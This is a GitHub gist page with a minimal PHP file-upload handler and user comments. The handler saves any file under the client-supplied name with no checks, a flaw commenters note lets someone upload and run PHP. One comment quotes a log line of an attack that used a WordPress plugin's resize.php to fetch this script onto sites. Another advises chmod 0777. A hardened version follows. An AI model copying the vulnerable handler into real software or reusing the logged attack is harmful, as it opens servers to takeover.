Simple file upload in php
<!DOCTYPE html>
<html>
<head>
  <title>Upload your files</title>
</head>
<body>
  <form enctype="multipart/form-data" action="upload.php" method="POST">
    <p>Upload your file</p>
    <input type="file" name="uploaded_file"></input><br />
    <input type="submit" value="Upload"></input>
  </form>
</body>
</html>

<?PHP
  if(!empty($_FILES['uploaded_file']))
  {
    $path = "uploads/";
    $path = $path . basename( $_FILES['uploaded_file']['name']);
    if(move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $path)) {
      echo "The file ". basename( $_FILES['uploaded_file']['name']).
      " has been uploaded";
    } else{
      echo "There was an error uploading the file, please try again!";
    }
  }
?>

amaddurrani commented Aug 17, 2018

Thanks a lot, it worked

rlischer commented Aug 21, 2018

Works perfectly, thank you!

yasin7044 commented Aug 25, 2018

I am getting this error

Warning: move_uploaded_file(images/WIN_20180406_20_47_39_Pro.jpg): failed to open stream: Permission denied in /home/vhosts/www.eightballpool.ml/index.php on line 4

Warning: move_uploaded_file(): Unable to move '/tmp/phpKsH2uQ' to 'images/WIN_20180406_20_47_39_Pro.jpg' in /home/vhosts/www.eightballpool.ml/index.php on line 4

BAHC commented Aug 29, 2018

Someone is using your "simple" gist in a really suspicious way:

91.214.44.136 - - [27/Aug/2018:08:22:16 +0200] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=https://gist.githubusercontent.com/taterbase/2688850/raw/b9d214c9cbcf624e13c825d4de663e77bf38cc14/upload.php HTTP/1.1" 302 593 "-" "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0"

BAHC commented Aug 29, 2018

Please use action="PATH_TO_YOUR_UPLOAD_DIRECTORY/"; instead of action="upload.php" for this gist!
It is because someone is using your gist to upload hazardous scripts to WordPress sites.

gyaanesh commented Sep 7, 2018

Really helpful and easy to understand.
Thank you

yzzz-hub commented Sep 7, 2018

@BAHC: it's not the code's problem. resize.php should sanitize the input instead of loading whatever is being injected into the GET parameter.

GioRosso commented Sep 20, 2018

> hmm i wonder why if i upload a file larger than 1 mb the error came out -.-

I have the very same problem. Cannot upload files larger than 2MB. All file types are supported, but not all sizes. I don't think this has to do anything with the server, because I'm using PHP gallery, which uploads files up to 5MB.

Anyone?

Amanrock123 commented Sep 29, 2018

Awesome tutorial... it helped me a lot...
Visit www.cseworldonline.com

Geekgurus commented Oct 23, 2018

Thanks for this, man.
It's legit!

diamond95 commented Oct 25, 2018

DID YOU REALLY CLOSE THE <input> TAG WITH </input>??

ROFL

qubadoff commented Oct 29, 2018

good work

wonsuc commented Feb 7, 2019

> I am getting this error
>
> Warning: move_uploaded_file(images/WIN_20180406_20_47_39_Pro.jpg): failed to open stream: Permission denied in /home/vhosts/www.eightballpool.ml/index.php on line 4
>
> Warning: move_uploaded_file(): Unable to move '/tmp/phpKsH2uQ' to 'images/WIN_20180406_20_47_39_Pro.jpg' in /home/vhosts/www.eightballpool.ml/index.php on line 4

Just give write permission to the folder.

weshuiz commented Jul 24, 2019

straight from w3school -_- and it isn't even protected against ufu exploit...

yosoyhendrix commented Oct 3, 2019

INCREDIBLE! THANK YOU!

upd:
curl -F "uploaded_file=@my_file.txt" http://server/upload.php

😁😁😁😁

faiswal commented Feb 28, 2020

I do not know where files go after uploading them

mdyrma2 commented Apr 6, 2020

Thank you very much. Good tutorial.

rwb99 commented Apr 18, 2020

Make an "uploads" directory in the same place as your PHP file
mkdir uploads

change directory permissions
chmod 0777 /var/www/html/uploads

also make sure file_uploads = On is set in php.ini

setting upload_max_filesize = 10M and
post_max_size = 10M in php.ini should allow up to 10MB

but you also need to set client_max_body_size 10M; in nginx config or LimitRequestBody 10485760 in Apache

I'm still not having any success with uploading anything over 2mb

I'm using it for a wget server

0cirius0 commented May 21, 2020

Thanks for this script. It really helped to solve a bigger issue I was having in understanding PHP upload code

munjoob commented Jul 13, 2020

try kleeja php file upload script
https://kleeja.org

vparitorres commented Aug 27, 2020

Excellent example.. Thanks for publishing..

kicktv commented Oct 28, 2020

@taterbase

work good.
thanks for the script

justinweichTV commented Nov 1, 2020

It doesn't work

dsinclair-work commented Dec 17, 2020

Awesome script, works great as long as you create an upload folder in the same destination as the upload.php

ghost commented Feb 1, 2021

thanks a lot bro :D

FAlbanni commented May 12, 2021

This sucks; anyone would be able to upload a .php file and take control of your server. Do NOT use it!

AllenJB commented Oct 9, 2021

This is a terrible example of handling file uploads.

It does not check for file upload errors (via the 'errors' element under $_FILES).

The 'name' is specified by the client and should not be trusted. It may also contain characters that are not valid for filenames on the server's filesystem.

There's no handling of duplicate filenames - one file upload could overwrite a previous file upload.

This code does not check the content of the uploaded file. You may be expecting an image to be uploaded, but the client may upload a PHP script instead - if that file is uploaded to a web accessible directory, the client could then execute that PHP script. This would lead to further compromises of your server and/or your hosting being used for malicious purposes (phishing, illegal content).

You should always check the content of uploaded files using the fileinfo extension, mime_content_type(), or a function specific to the expected content type (eg. the type returned by getimagesize() for images)
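
The checks listed in the comment above, combined into one handler as an added example (not the gist author's or any commenter's code). It assumes image uploads only, a 2 MiB application limit, and a hypothetical `private_uploads` directory outside the web root that already exists and is writable by PHP; `store_upload()` is a name introduced here.

```php
<?php
// Added example: hardened variant of upload.php. Assumptions (not from the gist):
// images only, a 2 MiB cap, and a storage directory outside the web root.
const UPLOAD_DIR = __DIR__ . '/../private_uploads';  // hypothetical path, not web-accessible
const MAX_BYTES  = 2 * 1024 * 1024;                  // assumed application limit
const ALLOWED    = [                                 // detected MIME type => extension we assign
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

function store_upload(array $file): string
{
    // 1. Errors reported by PHP itself, including the php.ini size limits.
    if (!isset($file['error']) || is_array($file['error'])) {
        throw new RuntimeException('Malformed upload request.');
    }
    switch ($file['error']) {
        case UPLOAD_ERR_OK: break;
        case UPLOAD_ERR_INI_SIZE:
        case UPLOAD_ERR_FORM_SIZE: throw new RuntimeException('File exceeds the size limit.');
        case UPLOAD_ERR_NO_FILE: throw new RuntimeException('No file was sent.');
        default: throw new RuntimeException('Upload failed with code ' . $file['error'] . '.');
    }
    if (filesize($file['tmp_name']) > MAX_BYTES) {
        throw new RuntimeException('File exceeds the size limit.');
    }
    // 2. Decide the type from the content, never from the client-supplied name or type.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime === false || !isset(ALLOWED[$mime])) {
        throw new RuntimeException('File type not allowed.');
    }
    // 3. Server-generated random name: no path tricks, no overwrites, no .php extension.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    // 4. move_uploaded_file() only accepts files that arrived via an HTTP POST upload.
    if (!move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $name)) {
        throw new RuntimeException('Could not store the file.');
    }
    return $name;
}

if (!empty($_FILES['uploaded_file'])) {
    try {
        echo 'Stored as ' . store_upload($_FILES['uploaded_file']);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
```

Content sniffing with fileinfo can be fooled by crafted files, so the storage location outside the web root and the server-chosen extension are what keep an uploaded script from being executed.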

Noemi4 commented Jan 1, 2022

Thank you very much, this one finally works!

Noemi4 commented Jan 1, 2022

For the ones complaining, the point of this script is that beginners can understand the base code for uploading files, and can add validation afterwards.

TinySonhh commented Feb 7, 2022

Thank you,
